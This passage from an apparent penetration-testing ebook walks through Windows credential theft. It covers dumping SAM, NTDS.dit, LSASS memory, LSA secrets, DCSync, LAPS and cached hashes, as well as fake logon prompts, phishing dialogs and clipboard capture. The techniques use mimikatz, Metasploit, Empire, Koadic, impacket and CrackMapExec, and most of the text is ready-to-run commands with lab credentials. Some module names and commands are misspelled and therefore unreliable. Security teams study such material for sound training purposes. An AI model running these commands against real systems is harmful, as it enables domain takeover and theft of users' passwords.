And VOILA! All the passwords have been retrieved.

Download Invoke-Powerdump Script

This method is an excellent one for local testing, AKA internal testing. To use this method, simply type
the following in the Powershell:

Import-Module <'path of the powerdump script'>

Invoke-PowerDump

And, it will dump all the credentials for you.

www.hackingarticles.in Page | 63
There is a good enough method to dump the hashes of the SAM file using mimikatz. The method is
pretty easy and best suited for internal penetration testing. In one of our previous article, we have
covered mimikatz, read that article click here. So in this method, we will
use token::elevate command. This command is responsible for allowing mimikatz to access the SAM
file to dump hashes. Now, to use this method use the following set of commands:

privilege::debug
token::elevate
lsadump::sam

www.hackingarticles.in Page | 64
Impacket tool can also extract all the hashes for you from the SAM file with the following command:

./secretsdump.py -sam /root/Desktop/sam -

system /root/Desktop/system LOCAL

When you have a meterpreter session of a target, just run the hashdump command and it will dump
all the hashes from the SAM file of the target system. The same is shown in the image below:

Another way to dump hashes through the hashdump module is through a post exploit that Metasploit
offers. To use the said exploit, use the following set of commands:

use post/windows/gather/hashdump
set session 1
exploit

www.hackingarticles.in Page | 65
Another way to dump credentials by using Metasploit is via another in-built post exploit. To use this
exploit, simply background your session and run the following command:

use post/windows/gather/credential/credential_collector
set session 1
exploit

The next method that Metasploit offers are by firing up the mimikatz module. To load mimikatz, use
the load kiwi command and then use the following command to dump the whole SAM file using
mimikatz.

lsa_dump_sam

www.hackingarticles.in Page | 66
Once you have the session by Koadic C2, use the hashdump_sam module to get passwords as shown
below:
use hashdump_sam
execute

All the hashes from the SAM file will be dumped as shown in the above image.

www.hackingarticles.in Page | 67
Once you have the session through the empire, interact with the session and use the mimikatz/sam
module to dump the credentials with help of the following commands:

usemodule credentials/mimikatz/sam*
execute

This exploit will run mimikatz and will get you all the passwords you desire by dumping the SAM file.

www.hackingarticles.in Page | 68
LaZagne is an amazing tool for dumping all kinds of passwords. We have dedicatedly covered LaZagne
in our previous article. To visit the said article, click here. Now, to dump SAM hashes with LaZagne,
just use the following command:

lazagne.exe all

Yay!!! All the credentials have been dumped.

CrackMapExec is a sleek tool that can be installed with a simple apt install and it runs very swiftly.
Using CrackMapExec we can dump the hashes in the SAM very quickly and easily. It requires a bunch
of things.
Requirements:
Username: Administrator
Password: Ignite@987
IP Address: 192.168.1.105
Syntax: crackmapexec smb [IP Address] -u ‘[Username]’ -p ‘[Password]’ –sam

crackmapexec smb 192.168.1.105 -u 'Administrator' -p

'Ignite@987' --sam

www.hackingarticles.in Page | 69
John the Ripper is an amazing hash cracking tool. We have dedicated two articles to this tool. To learn
more about John The Ripper, click here – part 1, part 2. Once you have dumped all the hashes from
the SAM file by using any of the method given above, then you just need John the Ripper tool to crack
the hashes by using the following command:

john –format=NT hash –show

And as you can see, it will reveal the password by cracking the given hash.

www.hackingarticles.in Page | 70
Empire provides us with a module that allows us to retrieve the saved credentials from various
applications such as PuTTY, WinSCP, etc. it automatically finds passwords and dumps them for you
without requiring you to do anything. Once you have your session in the empire, use the following
commands to execute the module:

usemodule credentials/sessiongopher
execute

www.hackingarticles.in Page | 72
And as you can see in the images above and below, it successfully retrieves passwords of WinSCP,
PuTTy.

Now we will focus on fewer applications and see how we can retrieve their passwords. We will go
onto the applications one by one. Let’s get going!

www.hackingarticles.in Page | 73
Core FTP server tool is made especially for windows. It lets you send and receive files over the network.
For this transfer of files, it uses FTP protocol which makes it relatively easy to use, irrespective of the
Operating System.
With the help of Metasploit, we can dump the credentials saved in the registry from the target system.
The location of the password is HKEY_CURRENT_USER\SOFTWARE\FTPWare\CoreFTP\Sites. You can
run the post-exploitation module after you have a session and run it, type:

use post/windows/gather/credentials/coreftp
set session 1
exploit

Just like Core FTP, the FTP navigator is the FTP client that makes transfers, editings, and renaming of
files easily over the network. It also allows you to keep the directories in-sync for both local and remote
users. We can use the command lazagne.exe all and we will have the FTPNavigator Credentials as
shown below:

www.hackingarticles.in Page | 74
The credentials of FTPNavigator can also be dumped using Metasploit as there is an in-built exploit for
it. To use this post-exploitation module, type:

use post/windows/gather/credetnials/ftpnavigator
set session 1
exploit

FileZilla is another open-source client/server software that runs on FTP protocol. It is compatible with
Windows, Linux, and macOS. It is used for transfer or editing or replacing the files in a network. We
can dump its credentials using Metasploit and do so, type:

use post/multi/gather/filezilla_client_cred
set session 1
exploit

www.hackingarticles.in Page | 75
It is an open-source tool for managing MySQL, MsSQL, PostgreSQL, SQLite databases. Numerous
sessions with connections can be saved along with the credentials while using HeidiSQL. It also lets
you run multiple sessions in a single window. Management of database is pretty easy if you are using
this software. Again, with the help of Metasploit we can get our hands on its credentials by using the
following post-exploitation module:

use post/windows/gather/creddtnitals/heidisql
set session 1
exploit

All the email passwords that are stored in the system can be retrieved with the help of the tool named
Mail PassView. This tool is developed by Nirsoft and is best suited for internal pentesting. Simple
download the software from here. Launch the tool to get the credentials as shown below:

www.hackingarticles.in Page | 76
Pidgin is an instant messaging software that allows you to chat with multiple networks. It is compatible
with almost all Operating Systems. It also allows you to transfer files too. There is an in-built post-
exploitation module for pidgin, in Metasploit, too. To initiate this exploit, use the following commands:

use post/multi/gather/pidgin_cred
set session 1
execute

And all the credentials will be on your screen.

www.hackingarticles.in Page | 77
PSI is an instant messenger that works over the XMPP network. It also allows you to transfer files. It is
highly customizable and comes in various languages. Using lazagne.exe chat command in LaZagne you
can dump its password as shown in the image below:

Nirsoft provides a tool that lets you retrieve all the PST passwords from Outlook. You can download
this tool from here. Simple launch the tool and you will have the passwords as shown below:

www.hackingarticles.in Page | 78
VNC is a remote access software that allows you to access your device from anywhere in the world.
VNC passwords can be easily retrieved by using Metasploit and to do so, type:

use post/windows/gather/credentials/vnc
set session 2
exploit

WinSCP is an FTP client which is based on SSH protocol from PuTTY. It has a graphical interface and
can be operated in multiple languages. It also acts as a remote editor. Both LaZagne and Metasploit
helps us to retrieve passwords. In LaZagne, use the command lazagne.exe all and it will dump the
credentials as shown in the image below:

www.hackingarticles.in Page | 79
To retrieve the credentials from Metasploit, use the following exploit:

use post/windows/gather/credentials/winscp
set session 1
exploit

This way, you can retrieve the credentials of multiple applications.

www.hackingarticles.in Page | 80
NTDS stands for New Technologies Directory Services and DIT stands for Directory Information Tree.
You can find the NTDS file at “C:\Windows\NTDS”. This file acts as a database for Active Directory and
stores all its data including all the credentials. The Default size of Ntds.dit is 12 MB which can be
extended up to 16TB.
The active directory database is stored in a single NTDS.dit file which is logically separated into the
following partitions:

If you take a look at the information that NTDS provides you then you can see that Schema partition
contains all the necessary information about objects along with their attributes and their relation to
one another. Configuration partition has all the forest and trees which further replicates itself to al
the domain controllers. Domain partition consists of all the information related to the domain. And
finally, all the details related to any application are stored in the application partition of Active
Directory. From a different perspective, you can also divide data which is found in NTDS in the Link
table and data table. The Link table has all the attributes which refer to the objects finally the data
table contains all the data related users, groups, etc.
The physical structure of NTDS has the following components.

Data Store Physical Structure Components

Now that we have an idea about the NTDS, it is time to extract some of those precious hashes from
the Server. We have the Windows Server with Active Directory setup in our lab environment for the
following practical.

www.hackingarticles.in Page | 82
FGDump is a tool that was created for mass password auditing of Windows Systems. This means that
if an attacker can use the FGDump to extract the password from the target machine. For these
purposes, we will need to download the FGDump from this link.
We fire up the windows command prompt and traverse to the path where we have downloaded the
FGDump. In this case, it is in the Downloads Directory. As we have an executable for the FGDump, we
ran it directly from the command prompt.

fgdump.exe
As no parameters were provided, FGDump by default did a local dump. After auditing the local
passwords, FGDump dumped Password and Cache successfully. Now let’s take a look at the dumped
data.

FGDump creates a file with the extension PWDump. It-dumps hashes in that file. The name of the
server is used as the name of the PWDump file. We can read the data on the file using the type
command. As shown in the image given below, FGDump has successfully dumped hashes from the
Target System.

type <pwdump file name>

www.hackingarticles.in Page | 83
Enough with the Windows Command prompt, it’s time to move on to the PowerShell. We are going
to use another executable called NTDSutil.exe. We launch an instance of PowerShell. Then we run
NTDSutil.exe with a bunch of parameters instructing it to make a directory called temp in the C:\ drive
and asks NTDSUtil to use its ability to tap into the Active Directory Database and fetch the SYSTEM
and SECURITY hive files as well as the ntds.dit file. After working for a while, we have the hive files in
the temp directory.

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create

full c:\temp' q q"

We transfer the hive files onto our Kali Linux Machine, to extract hashes from them. We will be using
the secretsdump.py file from the impacket toolkit to extract hashes. All we need is to provide the path
of the SYSTEM hive file and the NTDS.dit file and we are good to go. We see that in a matter of seconds
secretsdump extracts hashes for us.

./secretsdump.py -ntds /root/ntds.dit -system

/root/SYSTEM LOCAL

www.hackingarticles.in Page | 84
DSInternals is a framework designed by Michael Grafnetter for performing AD Security Audits. It is a
part of the PowerShell official Gallery. This means we can download it by using the cmdlet Save-
Module. After downloading we need to install the module before using it. This can be done using
the cmdlet Install-Module. This will require a change in the Execution Policy. After installing the
Modules, we are good to go.
We first use the Get-Bootkey cmdlet to extract the bootkey from the System Hive. After obtaining the
bootkey, we will use it to read the data of one or more accounts form the NTDIS file including the
secret attributes like hashes using the Get-ADBAccount cmdlet.

Save-Module DSInternals -Path

C:\Windows\System32\WindowsPowershell\v1.0\Modules
Set-ExecutionPolicy Unrestricted
Import-Module DSInternals
Get-BootKey -SystemHivePath 'C:\SYSTEM'
Get-ADDBAccount -All -DBPath 'C:\ntds.dit' -Bootkey
<bootkey value>

www.hackingarticles.in Page | 85
The Get-ADBAccount cmdlet creates a long sequence of output. Here we are showing you the data
of one of the users of the Target Machine. We can see that we have successfully extracted the NTLM
hashes from the NTDS.dit file.

Now it’s time to use some external tools for attacking the NTDIS file. We will be using the NTDSDumpEx
for this particular Practical. You can download it from here. We unzip the contents of the compressed
file we downloaded and then use the executable file to attack the NTDS file. We will need to provide
the path for the ntds.dit file and the System Hive file. In no time the NTDSDumpEx gives us a list of the
users with their respective hashes.

NTDSDumpEx.exe -d C:\ntds.dit -s
C:\SYSTEM

www.hackingarticles.in Page | 86
For all the Metasploit fans, there is no need to get depressed. Metasploit can work just fine in
extracting hashes from the NTDS.dit file. We have 2 exploits that can work side by side to target NTDS.
The first one locates the ntds file. We need a session on the Target System to move forward. After we
gain a session, we choose the NTDS_location exploit and set the session identifier to the exploit. Upon
running the exploit, we see that we have the location of the NTDS.dit file.

use post/windows/gather/ntds_location
set session 1
exploit

Moving on, we use another exploit that can extract the NTDS.dit file, SAM and SYSTEM hive files from
the Target System. The catch is, it transfers these files in .cab compressed files.

www.hackingarticles.in Page | 87
 use post/windows/gather/ntds_grabber
set session 1
exploit

The exploit works and transfers the cab file to a location that can be seen in the image. Now to extract
the NTDS.dit and other hive files, we are going to use a tool called cabextract. This will extract all 3
files.
cabextract <cab filename>

Now that we have the NTDS and the hive files at our disposal, we can use the impacket’s secretsdump
script to extract hashes from it as we did earlier.

Suppose a scenario where we were able to procure the login credentials of the server by any method
but it is not possible to access the server directly, we can use this exploit in the Metasploit framework
to extract the hashes from the NTDS.dit file remotely. We will use this auxiliary to grab the hashes.
We need to provide the IP Address of the Target Machine, Username and Password. The auxiliary will
grab the hashes and display them on our screen in a few seconds.

use auxiliary/scanner/smb/impacket/secretsdump
set rhosts 192.168.1.108
set smbuser administrator
set smbpass Ignite@987
exploit

www.hackingarticles.in Page | 88
CrackMapExec is a sleek tool that can be installed with a simple apt install and it runs very swiftly.
This tool acts as a database for Active Directory and stores all its data including all the credentials
and so we will manipulate this file to dump the hashes as discussed previously. It requires a bunch of
things.
Requirements:
Username: Administrator
Password: Ignite@987
IP Address: 192.168.1.105
Syntax: crackmapexec smb [IP Address] -u ‘[Username]’ -p ‘[Password]’ -ntds drsuapi

crackmapexec smb 192.168.1.105 -u

'Administrator' -p 'Ignite@987' --ntds drsuapi

To ensure that all the hashes that we extracted can be cracked, we decided to take one and extract it
using John the Ripper. We need to provide the format of the hash which is NT. John the Ripper will
crack the password in a matter of seconds.

www.hackingarticles.in Page | 89
 cat hash
john --format=NT hash --show

This concludes the various methods in which can extract the hashes that are stored in the Windows
Server. We included multiple tools to cover the various scenarios that an attacker can face. And the
only way to protect yourself against such attacks is to minimize the users who can access Domain
Controllers. Continuously, log and monitor the activity for any changes. It is frequently recertified.

www.hackingarticles.in Page | 90
Metasploit comes with an in-built post exploit that helps us to do the deed. As it is a post-exploitation
module, it just needs to be linked with an ongoing session. To use this module, simple type:

use post/windows/gather/phish_windows_credentials
set session 1
exploit

This module waits for a new process to be started by the user. After the initiation of the process, a
fake Windows security dialogue box will open, asking for the user credentials as shown in the image
below:

www.hackingarticles.in Page | 92
As the user enters their credentials, they will be apprehended and displayed as shown in the image
below:

FakeLogonScreen tool was created by Arris Huijgen. It is developed in C# because it allows various
Frameworks to inject the utility into memory. We will remotely execute this tool using Metasploit. But
first, let’s download the tool using the link provided below
Download FakeLogonScreen
We simply upload this tool from our meterpreter session and then remotely execute it using the
following set of commands:

upload /root/FakeLogonScreen.exe .
shell
FakeLogonScreen.exe

www.hackingarticles.in Page | 93
Upon execution, it will simulate the Windows lock screen to obtain the password from the user. To do
so, this tool will manifest the lock screen exactly like it is configured so that the user doesn’t get
suspicious, just as it is shown in the image below:

It will validate the credentials locally or from Domain Controller as the user enters them and then
display them on the console as shown in the image below:

www.hackingarticles.in Page | 94
This tool is very similar to the previous one. It was developed by Matt Pickford. just like
FakeLogonScreen, this tool, too, will exhibit the fake lock screen for the user to enter credentials and
then dump then keystroke by keystroke to the attacker.
Download SharpLocker
We will first upload this tool from our attacker machine to the target system and then execute it. So,
when you have the meterpreter session just type:

upload /root/Downloads/SharpLocker.exe .
shell
SharpLocker.exe
We downloaded the tool on the Desktop so we will traverse to that location and then execute it

Upon execution the tool will trigger the lock screen of the target system as shown in the image below:

www.hackingarticles.in Page | 95
And as the user enters the password, it will capture the keystrokes until the whole password is
revealed as shown in the image below:

This module of the PowerShell Empire will prompt a dialogue box on the target system, asking for
credentials like we did earlier. We can use this module with the following commands:

usemodule collection/prompt
execute

Once the user types in the credentials on the dialogue box, the module will display it on the terminal
as shown in the image below:

www.hackingarticles.in Page | 96
This module of PowerShell Empire triggers a restart notification like the one which is generated when
updates require and reboot to install. To use this module, type the following command:

usemodule collection/toasted
execute

Once the module executes, it will show the following dialogue box:

And once the Postpone button is clicked, it will ask for credentials to validate the decision to postpone
as shown in the image below:

And as the user enters the credentials, It will print them as shown in the image below:

www.hackingarticles.in Page | 97
A similar module to the one in PowerShell Empire can be found in Koadic. Once you have the session
using Koadic, use the following command to trigger the dialogue box:

use password_box
execute

When the user enters the username and password in the dialogue box, the password will be displayed
in the terminal too as shown in the image below:

www.hackingarticles.in Page | 98
There is a script that can be run on PowerShell which creates a fake login prompt for the user to enter
the credentials.
Download Invoke-CredentialsPhish.ps1
To initiate the script, type:

Import-Module C:\Users\raj\Desktop\Invoke-
CredentialsPhish.ps1
Invoke-CredentialsPhish

The execution of the above commands will pop out a prompt asking for credentials as shown in the
image below:

So, once the user enters the credentials, they will be displayed on the screen as shown in the image
below:

www.hackingarticles.in Page | 99
Similarly, there is another script developed by Matt Nelson. This script will again open a dialogue box
for the user to enter the passwords.
Download Invoke-LoginPrompt.ps1
To initiate the script, type the following:

Import-Module C:\Users\raj\Desktop\Invoke-
LoginPrompt.ps1
Invoke-LoginPrompt.ps1

As you can see the dialogue box emerges on the screen and the user enters the credentials, then
further they will be displayed back on the terminal.

www.hackingarticles.in Page | 100

Lockphish is another tool that allows us to phish out the credentials, you can download this tool from
here. This tool creates a template that looks like it is redirecting the user to a YouTube video that will
be hosted into a PHP server, but it will prompt the user to enter the login credentials and then send
them to the attacker.
Initiate the tool using the following command:

./lockphish.sh

It will generate a public link using ngrok as shown in the image above, send that link to the target.
When the target executed the link, it asks to save a file. For this step, strong social engineering skills
are required.

And after the user has entered the credentials, It will redirect the user to YouTube.

www.hackingarticles.in Page | 101

Then upon executing the downloaded file, the lock screen will be triggered and the user will be forced
to enter the credentials as shown in the image below:

And, we will have our credentials as shown in the image below:

www.hackingarticles.in Page | 102

Credential Dumping: Local Security
Authority (LSA|LSASS.EXE)
LSA and LSASS stands for “Local Security Authority” And “Local Security Authority Subsystem (server)
Service”, respectively
The Local Security Authority (LSA) is a protected system process that authenticates and logs users on
to the local computer. Domain credentials are used by the operating system and authenticated by the
Local Security Authority (LSA). The LSA can validate user information by checking the Security Accounts
Manager (SAM) database located on the same computer.
The LSA is a user-mode process (LSASS.EXE) used to stores the security information of a system known
as the Local Security Policy. The LSA maintains local security policy information in a set of objects.
 The policy contains global policy information.
 TrustedDomain contains information about a trusted domain.
 The account contains information about a user, group, or local group account.
 Private Data contains protected information, such as server account passwords. This
information is stored as encrypted strings.
LSASS manages the local system policy, user authentication, and auditing while handling sensitive
security data such as password hashes and Kerberos keys. The secret part of domain credentials, the
password, is protected by the operating system. Only code running in-process with the LSA can read
and write domain credentials.
LSASS can store credentials in multiple forms, including:
 Reversibly encrypted plaintext
 Kerberos tickets (ticket-granting tickets (TGTs), service tickets)
 NT hash
 LAN Manager (LM) hash

www.hackingarticles.in Page | 104

In your local machine (target) and open the task manager, navigate to processes for exploring the
running process of lsass.exe and make a right-click to explore its snippet. Choose the “Create Dump
File” option which will dump the stored credential.

You will get the “lsass.DMP” file inside the /Temp directory of the user account directory under
/AppData/local

www.hackingarticles.in Page | 105

Now start mimikatz to get the data out of the DMP file using the following command:

privilege::debug
sekurlsa::minidump
C:\Users\raj\AppData\Local\Temp\lsass.DMP
sekurlsa::logonpasswords

As you can see from the image below, we have a clear text password.

www.hackingarticles.in Page | 106

The ProcDump tool is a free command-line tool published by Sysinternals whose primary purpose is
monitoring an application and generating memory dumps.
Use the “-accepteula” command-line option to automatically accept the Sysinternals license
agreement and “-ma” Parameter to write a dump file with all process memory (lsass.exe) in a .dmp
format.

procdump.exe -accepteula -ma lsass.exe

mem.dmp

Again, repeat the same step and use mimikatz to read the mem.dmp file.

privilege::debug
sekurlsa::minidump C:\Users\raj\Downloads\Procdump\mem.dmp
sekurlsa::logonpasswords

And now, as you can see from the image below, we’ve got a clear-text password.

www.hackingarticles.in Page | 107

The comsvcs.dll DLL found in Windows\system32 that call minidump with rundll32, so you can use it
to dump the Lsass.exe process memory to retrieve credentials. Let’s identify the process ID for lsass
before running the DLL.

Get-Process lsass
.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump
492 C:\mem.dmp full

Again, repeat the same step and use mimikatz to read the mem.dmp file.

privilege::debug
sekurlsa::minidump C:\mem.dmp
sekurlsa::longonpasswords

Again, we’ve got a clear-text password.

www.hackingarticles.in Page | 108

The Lsass.exe is renamed as LSA in Windows 10 and the process can be found by the name of “Local
Security Authority” inside the task manager. It will also save the dump file in .dmp format so, again
repeat the same steps as done above.
Go to the Task Manager and explore the process for Local Security Authority, then extract its dump as
shown.

www.hackingarticles.in Page | 109

You will get the “lsass.DMP” file inside the /Temp directory of the user account directory under
/AppData/local.

Again, repeat the same step and use mimikatz to read the dmp file.

privilege::debug
sekurlsa::minidump
C:\Users\raj\AppData\Local\Temp\lsass.DM
P
sekurlsa::longonpasswords

Since it was Windows 10 therefore, the level of security get increases and we have obtained the
password hashes, as you can see from the given below image.

www.hackingarticles.in Page | 110

www.hackingarticles.in Page | 111
The “-patch” parameter is patching the samsrv.dll running inside lsass.exe which displays LM and NT
hashes. So, you when you will execute the following commands it will dump the password hashes.

privilege::debug
lsadump::lsa /patch

www.hackingarticles.in Page | 112

We are using mimikatz once again to get the hashes directly, without involving any dump file or DLL
execution this is known as “Token Impersonation”. As you can observe, we got an error when we try
to run the following command as a local user.

privilege::debug
lsadump::secrets

This can be done by impersonating a token that will be used to elevate permissions to SYSTEM
(default) or find a domain admin token and as the result, you will able to dump the password in clear-
text.

privilege::debug
token::elevate
lsadump::secrets

www.hackingarticles.in Page | 113

The LSA secrets are held in the Registry. If services are run as local or domain user, their passwords
are stored in the Registry. If auto-logon is activated, it will also store this information in the Registry.
This can be done also done locally by changing permission values inside the registry. Navigate
to Computer\HKEY_LOCAL_MACHINE\SECURITY.

Expand the SECURITY folder and choose permissions from inside the list.

www.hackingarticles.in Page | 114

Allow “Full Control” to the Administrator user as shown.

As you can observe that this time, we can fetch sub-folders under Security directories.

www.hackingarticles.in Page | 115

So, once you run the following command again, you can see the credential in the plain text as shown.

privilege::debug
lsadump::secrets

Similarly, you can use another approach that will also operate in the same direction. Save system and
security registry values with the help of the following command.

reg save HKLM\SYSTEM system

reg save HKLM\security
security

www.hackingarticles.in Page | 116

As you can see if you use the “lsa::secrets” command without a specified argument, you will not be
able to retrieve the password, but if you enter the path for the file described above, mimikatz will
dump the password in plain text.

privilege::debug
lsadump::secrets/system:c:\system /security:c:\security

www.hackingarticles.in Page | 117

Empire is one of the good Penetration Testing Framework that works like Metasploit, you can
download it from GitHub and install it in your attacking machine to launch an attack remotely.
This is a post exploit, thus first you need to be compromised the host machine and then use the
following module for LSA secrets dumps

usemodule credentials/mimikatz/lsadump
execute

As a result, it dumps password hashes saved as shown in the given image.

www.hackingarticles.in Page | 118

Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other
penetration testing tools such as Meterpreter and Powershell Empire. It allows the attacker to run
comsvcs.dll that will call the minidump and fetch the dump of lsass.exe to retrieve stored NTLM
hashes. Read more from here

use comsvcs_lsass
As a result, it dumped the password hashes saved as shown in the given image.

www.hackingarticles.in Page | 119

As we all know Metasploit is like the Swiss Knife, it comes with multiple modules thus it allows the
attacker to execute mimikatz remotely and extract the Lsass dump to fetch the credentials. Since it is
a post-exploitation thus you should have a meterpreter session of the host machine at Initial Phase
and then load kiwi to initialise mimikatz and execute the command.

load kiwi
lsa_dump_secrets

www.hackingarticles.in Page | 120

Similarly, you can also load PowerShell in the place of kiwi and perform the same operation, here we
are using the PowerShell script of mimikatz. This can be done by executing the following commands:

load powershell
powershell_import /root/powershell/Invoke-
Mimikatz.ps1
sekurlsa::logonpasswords

This will be dumping the password hashes as shown in the below image.

www.hackingarticles.in Page | 121

CrackMapExec is a sleek tool that can be installed with a simple apt install and it runs very swiftly. LSA
has access to the credentials and we will exploit this fact to harvest the credentials with this tool so
we will manipulate this script to dump the hashes as discussed previously. It requires a bunch of things.
Requirements:
Username: Administrator
Password: Ignite@987
IP Address: 192.168.1.105
Syntax: crackmapexec smb [IP Address] -u ‘[Username]’ -p ‘[Password]’ –lsa

crackmapexec smb 192.168.1.105 -u 'Administrator' -p

'Ignite@987' --lsa

www.hackingarticles.in Page | 122

In our practise, we have used bitswarden password manager to keep our password secure. It’s feasible
to use and even if we forget our password, we can just copy it from there and paste it where we
require it. As you can see in the image below, we have saved our password in bitswarden. And we
copy it from there.

www.hackingarticles.in Page | 124

If these credentials are copied by someone then we can retrieve them by using various methods.
PowerShell Empire has such a module; after having a session through the empire, use the following
commands to execute the module:

usemodule collection/clipboard_monitor
execute

Once the module is executed, whenever they copied password is pasted as shown in the image below:

www.hackingarticles.in Page | 125

Then those credentials will be displayed in the console as shown in the image below:

In Metasploit, when you have a meterpreter session, it provides you with a different set of commands.
One of those commands is load extapi, this command opens a door to various features of the
meterpreter session. All of these features can be viewed using a question mark (?). One feature of
extapi is clipboard management commands. We will use a clipboard management command through
extapi to dump the credentials which can be copied to the clipboard. For this, type:

load extapi
clipboard_monitor_start

www.hackingarticles.in Page | 126

Just like PowerShell empire, Koadic has an inbuilt module for dumping the clipboard data. Once you
have a session in koadic, type the following commands to get the clipboard data:

use clipboard
execute

And this way, again, we have the credentials.

www.hackingarticles.in Page | 127

The Mimikatz DCSYNC-function allows an attacker to replicate Domain Controller (DC) behaviour.
Typically impersonates as a domain controller and request other DC’s for user credential data via
GetNCChanges.
But compromised account should be a member of administrators, Domain Admin or Enterprise Admin
to retrieve account password hashes from the other domain controller. As a result, the intruder will
build Kerberos forged tickets using a retrieved hash to obtain any of the Active Directory ‘s resources
and this is known as Golden Ticket attack.

So, here we have a normal user account, hence at present User, Yashika is not a member of any
privileged account (administrators, Domain Admin or Enterprise Admin).

When the attacker attempts to execute the command MimiKatz-DCSYNC to get user credentials by
requesting other domain controllers in the domain, this will cause an error as shown in the image. This
is not possible.

www.hackingarticles.in Page | 129

So now we have granted Domain Admins right for user Yashika and now yashika has become a member
of domain Admin Group which is also AD a privileged group.

We then confirmed this by listing the details of user Yashika ‘s group information and found that she
is part of the domain admin group.

www.hackingarticles.in Page | 130

Now let ask for a credential for KRBTGT account by executing the following command using mimikatz:

lsadump::dcsync /domain:ignite.local
/user:krbtgt
As a result, it will retrieve the KRBTGT NTLM HASH, this hash further can be used to conduct the very
famous GOLDEN Ticket attack, read more about it from here.

www.hackingarticles.in Page | 131

Similarly, for every user account in the domain with the same command, we can obtain credentials.
Here, it not only requests the current hash but also seeks to get the previous credentials stored.

lsadump::dcsync /domain:ignite.local
/user:kavish

www.hackingarticles.in Page | 132

If you want to conduct this attack remotely, PowerShell Empire is one of the best tools to conduct
DCSYNC attack. Only you need to compromise the machine that is a member privilege account
(administrators, Domain Admin or Enterprise Admin) as shown here.

Now load the following module that will invoke the mimikatz Powershell script to execute the dcsync
attack to obtain the credential by asking from another domain controller in the domain.
Here again, we will request for KRBTGT account Hashes and as result, it will retrieve the KRBTGT NTLM
HASH.

usemodule credentials/mimikatz/dcsync_hashdump
set user krbtgt
execute

www.hackingarticles.in Page | 133

Likewise, the Empire has a similar module that retrieves the hash of the entire domain controller
user’s account.

usemodule credentials/mimikatz/dcsync_hashdump
execute

www.hackingarticles.in Page | 134

If you have a meterpreter session of the victim machine whose account is a member of domain admin,
then here also you can execute Mimikatz-DCSYNC attack to obtain the user’s password.

If your compromised account is a member of the domain admin group, then without wasting time
load KIWI and run the following command:

dcsync_ntlm krbtgt
dcsync krbtgt

www.hackingarticles.in Page | 135

As a result, we found the hashes for krbtgt account and this will help us to conduct Golden Ticket
attack further.

www.hackingarticles.in Page | 136

This attack is being tested on Windows Server 2016 & Windows 10, and you can use the reference link
above to configure it. When you install LAPS at some time, you will need to select the feature for the
management tool installation.
Choose “Will be installed on the local hard drive” under Management Tools for fat client UI,
PowerShell module, GPO editor Templates.

www.hackingarticles.in Page | 138

Further, continue with your installation and configuration with the help of an official link and follow
the same steps for the Client.

Then we have run the following command in PowerShell that will integrate LAPS on our OU “tech”

Import-Module AdmPwd.PS
Update-AdmPwdADSchema
Set-AdmPwdComputerSelfPermission -OrgUnit Tech
Set-AdmPwdReadPasswordPermission -OrgUnit Tech -
AllowedPrincipals Administrators

www.hackingarticles.in Page | 139

Now set up a group policy on LAPS by navigating to:
In the GPO, go to Computer Configuration > Policies > Administrative Templates > LAPS Enables the
following settings:
 Password Settings
 Name of an administrator account to manage.
 Enable local administrator password management.

Now navigate to Active Directory Users and computers, then select the OU for your LAPs.

NOTE: Enable the Advance feature view as shown in

the image.

www.hackingarticles.in Page | 140

Now to ensure that it is working fine, let’s check the password given by LAPs to CLIENT1 in its
properties. As you can observe in the given below image the LAPS has assigned the random password
to the client1.

Similarly, with the help LAPS application, we can search for a password for any user’s password, as we
have looked for client1’s password.
I Hope, till here you have understood the working and importance of LAPS in any organization. Now
let’s we how an attacker can take advantage of LAPs and dump the user’s credential.

www.hackingarticles.in Page | 141

On a compromised account of DC, use the following module of the Metasploit to extract the LAPS
password for other end users.
This module will recover the LAPS (Local Administrator Password Solution) passwords, configured in
Active Directory, which is usually only accessible by privileged users. Note that the local administrator
account name is not stored in Active Directory, so it is assumed to be ‘Administrator’ by default.

use post/windows/gather/credentials/enum_laps
post(windows/gather/credentials/enum_laps) > set
session 1
post(windows/gather/credentials/enum_laps) >
exploit

As a result, it will dump the password in cleartext as shown in the image given below.

www.hackingarticles.in Page | 142

The same can be done with the help of PowerShell Empire, it allows an attacker to dump the end-
user's credentials through a compromised account. It uses a PowerShell script to get the LAPS
password with the help of the following:

usemodule credential/get_lapspasswords
execute
Similarly, we it will also dump password in cleartext; thus, an attacker can access the other machine
present in the network with the help of extracted credentials.

www.hackingarticles.in Page | 143

Microsoft Windows stores previous users’ logon information locally so that they can log on if a logon
server is unreachable during later logon attempts. This is known as Domain Cache credential (DCC)
but in-actually it is also known as MSCACHE or MSCASH hash. It sorted the hash of the user’s
password that you can’t perform pass-the-hash attacks with this type of hash. It uses MSCACHE
algorithm for generating password hash and that are stored locally in the Windows registry of the
Windows operating system. These hashes are stored in the Windows registry, by default the last 10
hashes.
There two versions of MSCASH/MSCACHE or DCC
 MSCACHEV1 or DCC1 used before Vista Server 2003
 MSCACHEV2 or DCC2 used after Vista & Server 2003

Metasploit helps the pen tester to extract the stored hashes by exploiting the registry for MSCACHE
stored hashes. This module uses the registry to extract the stored domain hashes that have been
cached as a result of a GPO setting. The default setting on Windows is to store the last ten successful
logins.

use post/windows/gather/cachedump
set session 2
exploit

As a result, it will dump the password hashes, and these fetched from inside DCC2/MSCACHE as shown
in the image given below.

www.hackingarticles.in Page | 145

This hash can be extracted using python impacket libraries, this required system and security files
stored inside the registry. With the help of the following command, you can pull out these files from
the registry and save them on your local machine.

reg save hklm\system c:\system

reg save hklm\security c:\security

Further copy the system and security file on that platform where impacket is installed, in our case we
copied it inside kali Linux and use the following for extracting DCC2/MSCACHE hashes.

python secretsdump.py -security -system system LOCAL

Boom!!!! You will get the DCC2/MSCACHEv2 hashes on your screen.

www.hackingarticles.in Page | 146

As we all know, mimikatz is one of the best penetration testing tools for credential dumping windows.
So, we can get DCC2 / MSCACHEv2 hashes using mimikatz by installing it on a compromised host and
executing the following command:

privilege::debug
token::elevate
lsadump::cache

And again, you will get the MSCACHEv2 hashes on your screen.

www.hackingarticles.in Page | 147

Moving to our next technique, PowerShell Empire has a module that extracts the MSCACHEV2 hashes
from the inside registry of the compromised machine. So, download and run Empire on your local
machine and compromise the host machine once to use the empire post module and then type as
follows:

usemodule credentails/mimikatz/cache
set agent <agent_id>
execute

And again, you will get the MSCACHEv2 hashes on your screen.

www.hackingarticles.in Page | 148

Just like the Powershell empire, you can use koadic to extract the DCC2 hashes. You can read more
